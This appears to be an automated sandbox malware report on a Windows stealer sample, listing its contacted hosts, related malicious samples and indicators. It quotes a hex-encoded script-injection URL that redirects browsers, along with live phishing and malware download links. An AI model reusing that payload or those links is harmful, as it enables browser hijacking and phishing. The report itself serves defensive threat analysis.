http://ip-api.comd	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.00000000026C0000.00000004.00000800.00020000.00000000.sdmp, tmp294C.tmp.dat.0.dr, tmpBFF4.tmp.dat.0.dr, History.txt0.0.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmpC004.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://cfl.dropboxstatic.com/static/metaserver/static/css/error.css	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://forums.dropbox.com	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://api.ipify.org	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.dropbox.com/help	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://api.telegram.orgd	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A84000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com/xmld	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	tmpC004.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	tmp294C.tmp.dat.0.dr, tmpBFF4.tmp.dat.0.dr	false	URL Reputation: safe	unknown
http://api.telegram.org	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A96000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	B5U2ccQ8H1.exe, 00000000.00000002.1820582284.00000000036D0000.00000004.00000800.00020000.00000000.sdmp, tmp3C90.tmp.dat.0.dr, tmpBACF.tmp.dat.0.dr	false	URL Reputation: safe	unknown
https://cfl.dropboxstatic.com/static/images/favicon.ico	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.dropbox.com/home	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002722000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002716000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271A000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.000000000271E000.00000004.00000800.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002726000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://dl.dropboxusercontent.com	B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002651000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
104.26.12.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
188.114.97.3	freegeoip.app	European Union	13335	CLOUDFLARENETUS	true
162.125.66.15	edge-block-www-env.dropbox-dns.com	United States	19679	DROPBOXUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1468636
Start date and time:	2024-07-07 07:05:06 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	B5U2ccQ8H1.exe renamed because original name is a hash value
Original Sample Name:	86108d3bcc19fe774cc81b71494d31f9.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@1/84@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 81 Number of non-executed functions: 30
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:05:56	API Interceptor	135x Sleep call for process: B5U2ccQ8H1.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	cheat fivem.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber	Browse	ip-api.com//json/81.181.62.99
	cheat fivem.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber	Browse	ip-api.com//json/8.46.123.33
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	ip-api.com/xml
	SecuriteInfo.com.Trojan.MulDrop20.16243.24393.7295.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	cherax.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	SecuriteInfo.com.Win64.PWSX-gen.4730.25340.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json
	SecuriteInfo.com.Win32.Evo-gen.8172.10686.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=225545
	INVOICE.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	EZFNinstaller-20240129.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
149.154.167.220	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse
	cherax.exe	Get hash	malicious	Blank Grabber	Browse
	Acal BFi UK - Products List 020240704.exe	Get hash	malicious	AgentTesla, RedLine, StormKitty, XWorm	Browse
	McrflHf6vg.exe	Get hash	malicious	WhiteSnake Stealer	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	19808bS58f.exe	Get hash	malicious	AgentTesla	Browse
	0VcrCVxnMP.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	SecuriteInfo.com.Win64.PWSX-gen.4145.5357.exe	Get hash	malicious	AgentTesla	Browse
	project plan.exe	Get hash	malicious	Snake Keylogger	Browse
	payment.exe	Get hash	malicious	Snake Keylogger	Browse
104.26.12.205	SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exe	Get hash	malicious	Conti, PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse	api.ipify.org/
	lods.cmd	Get hash	malicious	Remcos	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
freegeoip.app	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	188.114.96.3
	Pots.exe	Get hash	malicious	44userber Stealer, Rags Stealer	Browse	104.21.73.97
	qdHMT36Tn9.exe	Get hash	malicious	44Caliber Stealer, Njrat, Rags Stealer	Browse	172.67.160.84
	64drop.exe	Get hash	malicious	44Caliber Stealer, Rags Stealer	Browse	104.21.73.97
	123.scr.exe	Get hash	malicious	Unknown	Browse	104.21.73.97
	123.scr.exe	Get hash	malicious	Rags Stealer	Browse	104.21.73.97
	123.scr.exe	Get hash	malicious	Rags Stealer	Browse	172.67.160.84
	RP.sfx.exe	Get hash	malicious	44Caliber Stealer, Rags Stealer	Browse	172.67.160.84
	i6R4NsEd8t.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.73.97
	3vj5tYFb6a.exe	Get hash	malicious	Snake Keylogger, zgRAT	Browse	172.67.160.84
edge-block-www-env.dropbox-dns.com	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	162.125.66.15
	https://dl.dropboxusercontent.com/scl/fi/adtf8tdt2awfvsxc7vm5b/Deutche-telekom-rechnung.zip?rlkey=j3mdg9qy4kpk2lblrj4c93bix&st=rgigszl2&dl=0	Get hash	malicious	Unknown	Browse	162.125.66.15
	https://dl.dropboxusercontent.com/scl/fi/2urfr5q3ixqp323mpxvhk/doc0992002349204234.zip?rlkey=y7i8kx77whrcy1cmi0q2meqie&st=b7dosz01&dl=0	Get hash	malicious	Unknown	Browse	162.125.66.15
	https://www.dropbox.com/scl/fi/p92p9aitvnggkrnq0y5l8/ADOBEasto-ENDOC-TGYFNSXPQUGD.zip?rlkey=7xjbuk0h30xgt2bfl2cofrteu&st=8uh716jf&dl=1	Get hash	malicious	Unknown	Browse	162.125.66.15
	https://www.dropbox.com/scl/fi/p92p9aitvnggkrnq0y5l8/ADOBEasto-ENDOC-TGYFNSXPQUGD.zip?rlkey=7xjbuk0h30xgt2bfl2cofrteu&st=8uh716jf&dl=1	Get hash	malicious	Unknown	Browse	162.125.66.15
	https://dl.dropboxusercontent.com/scl/fi/ssrtsruwybdh9nryde8cy/doc09194992304029942.zip?rlkey=7ohjqlkztcaq70mg47cinafu3&st=h88qnqqw&dl=0	Get hash	malicious	Unknown	Browse	162.125.66.15
	Image is copyrighted.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	162.125.66.15
	https://www.dropbox.com/l/AACUzblEiF1t5WZvAlLKyT3qXow1xVBTwNQ	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	162.125.66.15
	http://att-twilight-credit-b0db.lindammatthews.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	162.125.66.15
	http://attyahoonewworker-white-art-e0ce.danelle268.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	162.125.66.15
ip-api.com	cheat fivem.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber	Browse	208.95.112.1
	cheat fivem.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber	Browse	208.95.112.1
	https://leightonpetroleum.com/	Get hash	malicious	Unknown	Browse	51.77.64.70
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.MulDrop20.16243.24393.7295.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	cherax.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	SecuriteInfo.com.Win64.PWSX-gen.4730.25340.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	SecuriteInfo.com.Win32.Evo-gen.8172.10686.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	INVOICE.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	EZFNinstaller-20240129.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
api.ipify.org	https://pttgov-ib.top/help/	Get hash	malicious	Unknown	Browse	104.26.12.205
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	104.26.13.205
	SecuriteInfo.com.Win64.PWSX-gen.4730.25340.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	iKV4zArPsx.exe	Get hash	malicious	GuLoader	Browse	172.67.74.152
	INVOICE.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	Scanned Invoice.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Doc6078451035.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	IMG 003.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	msupdate.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	msupdate.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
api.telegram.org	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	149.154.167.220
	cherax.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	Acal BFi UK - Products List 020240704.exe	Get hash	malicious	AgentTesla, RedLine, StormKitty, XWorm	Browse	149.154.167.220
	McrflHf6vg.exe	Get hash	malicious	WhiteSnake Stealer	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	19808bS58f.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	0VcrCVxnMP.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	149.154.167.220
	https://www.mediafire.com/file/9gqqmzveuoh1gqc/Confirmation+of+Payment.tgz/file	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	SecuriteInfo.com.Win64.PWSX-gen.4145.5357.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	project plan.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	https://telegrambot-chain.pages.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	149.154.167.220
	cherax.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	https://tr.alertsgame.ru/	Get hash	malicious	Unknown	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	msgURKEN5P.exe	Get hash	malicious	RedLine	Browse	149.154.167.99
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	https://telegra.ph/BTC-Transaction--433854-05-10?hs=e7822360e2d7939bf6963a027637c1ff&	Get hash	malicious	Unknown	Browse	149.154.167.99
CLOUDFLARENETUS	https://www.metauka.com/buscar.php?q=8xdlpb%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%27%2C%27%74%74%27%2C%27%70%27%2C%27%73%3A%2F%27%2C%27%2F%77%27%2C%27%77%77%2E%77%27%2C%27%65%62%27%2C%27%77%61%74%63%27%2C%27%68%65%72%27%2C%27%6F%6E%27%2C%27%6C%27%2C%27%69%6E%27%2C%27%65%2E%78%27%2C%27%79%7A%27%2C%27%2F%32%27%2C%27%35%27%2C%27%50%42%27%2C%27%4E%5A%27%2C%27%39%27%2C%27%39%2F%37%27%2C%27%43%35%27%2C%27%58%33%27%2C%27%53%57%27%2C%27%34%2F%3F%73%75%62%31%3D16%26%73%75%62%32%3D309%2D14441%26%73%75%62%33%3D1271%2D102518%2D22496%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E#h6fmSBGiZh8X20Zr6k7p	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://sectocarewl.online/mona-michelle/	Get hash	malicious	Unknown	Browse	141.101.120.10
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	172.64.41.3
	cheat fivem.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber	Browse	162.159.128.233
	cheat fivem.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber	Browse	162.159.135.232
	back.exe	Get hash	malicious	LummaC	Browse	104.21.91.148
	https://update2024.tkka.my.id/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.hergunavantaj.com.tr/b2f8kde14j/account	Get hash	malicious	Unknown	Browse	172.67.205.244
	https://belgearsiviadeleriniz.com/basvur/	Get hash	malicious	Unknown	Browse	104.16.53.111
	https://anp.ab9.mywebsitetransfer.com/edd	Get hash	malicious	Unknown	Browse	104.19.178.52
CLOUDFLARENETUS	https://www.metauka.com/buscar.php?q=8xdlpb%22%3E%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%2E%6A%70%67%22%20%6F%6E%65%72%72%6F%72%3D%22%76%61%72%20%75%72%6C%31%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%20%76%61%72%20%75%72%6C%32%20%3D%20%5B%27%68%74%74%70%3A%2F%2F%67%27%2C%27%6F%6F%67%27%2C%27%6C%65%2E%63%6F%6D%27%2C%27%2F%27%2C%27%23%27%2C%27%66%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%76%61%72%20%75%72%6C%20%3D%20%5B%27%68%27%2C%27%74%74%27%2C%27%70%27%2C%27%73%3A%2F%27%2C%27%2F%77%27%2C%27%77%77%2E%77%27%2C%27%65%62%27%2C%27%77%61%74%63%27%2C%27%68%65%72%27%2C%27%6F%6E%27%2C%27%6C%27%2C%27%69%6E%27%2C%27%65%2E%78%27%2C%27%79%7A%27%2C%27%2F%32%27%2C%27%35%27%2C%27%50%42%27%2C%27%4E%5A%27%2C%27%39%27%2C%27%39%2F%37%27%2C%27%43%35%27%2C%27%58%33%27%2C%27%53%57%27%2C%27%34%2F%3F%73%75%62%31%3D16%26%73%75%62%32%3D309%2D14441%26%73%75%62%33%3D1271%2D102518%2D22496%27%5D%2E%6A%6F%69%6E%28%27%27%29%3B%0D%0A%20%75%72%6C%20%3D%20%75%72%6C%2E%72%65%70%6C%61%63%65%28%2F%2C%2F%67%2C%20%27%27%29%3B%20%76%61%72%20%77%69%6E%20%3D%20%77%69%6E%64%6F%77%2E%6F%70%65%6E%28%75%72%6C%2C%20%27%5F%73%65%6C%66%27%29%3B%20%77%69%6E%2E%6F%70%65%6E%65%72%20%3D%20%6E%75%6C%6C%3B%20%77%69%6E%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%75%72%6C%29%3B%22%3E#h6fmSBGiZh8X20Zr6k7p	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://sectocarewl.online/mona-michelle/	Get hash	malicious	Unknown	Browse	141.101.120.10
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	172.64.41.3
	cheat fivem.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber	Browse	162.159.128.233
	cheat fivem.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber	Browse	162.159.135.232
	back.exe	Get hash	malicious	LummaC	Browse	104.21.91.148
	https://update2024.tkka.my.id/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.hergunavantaj.com.tr/b2f8kde14j/account	Get hash	malicious	Unknown	Browse	172.67.205.244
	https://belgearsiviadeleriniz.com/basvur/	Get hash	malicious	Unknown	Browse	104.16.53.111
	https://anp.ab9.mywebsitetransfer.com/edd	Get hash	malicious	Unknown	Browse	104.19.178.52
TUT-ASUS	cheat fivem.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber	Browse	208.95.112.1
	cheat fivem.exe	Get hash	malicious	Discord Token Stealer, MercurialGrabber	Browse	208.95.112.1
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.MulDrop20.16243.24393.7295.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	cherax.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	SecuriteInfo.com.Win64.PWSX-gen.4730.25340.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	SecuriteInfo.com.Win32.Evo-gen.8172.10686.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	INVOICE.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	EZFNinstaller-20240129.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	DHL ESTADO DE CUENTA - 7664557687757.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://41619ec8e8407cbea965833e1fb35e027cd895bdef33c8d4bb7a06d460.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	https://f4dfc3a6ab223a609ab2682120fd9f431b51dcff8df1312719112d196d.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	https://df2f9d0204d7f42110452adfb9a45d39eaf5f3cccd842ff8b1eb858a83.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	https://eaglecomputersystems.com/	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	https://18b03de5-136a-42be-b26e-3fcb7fc3a767-00-39mzoh574apng.spock.replit.dev/english.html	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	https://www.hergunavantaj.com.tr/bfiokmj9m0/account	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	https://pttgov-ib.top/help/	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	http://best-practice-and-impact.github.io/govcookiecutter/	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	https://leightonpetroleum.com/	Get hash	malicious	Unknown	Browse	149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15
	https://bemerthiauyt6666.anakembok.de/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220 104.26.12.205 188.114.97.3 162.125.66.15

Process:	C:\Users\user\Desktop\B5U2ccQ8H1.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1248
Entropy (8bit):	5.347863460191528
Encrypted:	false
SSDEEP:	24:ML9E4KXAE4KzecKDE4KhKiKhPKIE4oKNzKoR1qE4jE4K5sXE4qdKm:MxHKXAHKzecYHKh3oPtHo6Z1qHjHKMHA
MD5:	54A35BA0C52DAD92F72A95BF0D28B57C
SHA1:	952FB1B41527E6899AFA00BAA14ADAED5D94DA4C
SHA-256:	775EA2475D29721BAF6265B12E7B610D451E1A8E42A8B49BA2F73A693A848FF2
SHA-512:	DCCE2FA4E7BC913FD40132B87D3D29DDCD4A2659EC7F84220EAF44E73032D452CDD64508816F8EE4AB4A32A6B9391D536E07F938F4EAB2ACB5CFB33314E956EB
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, 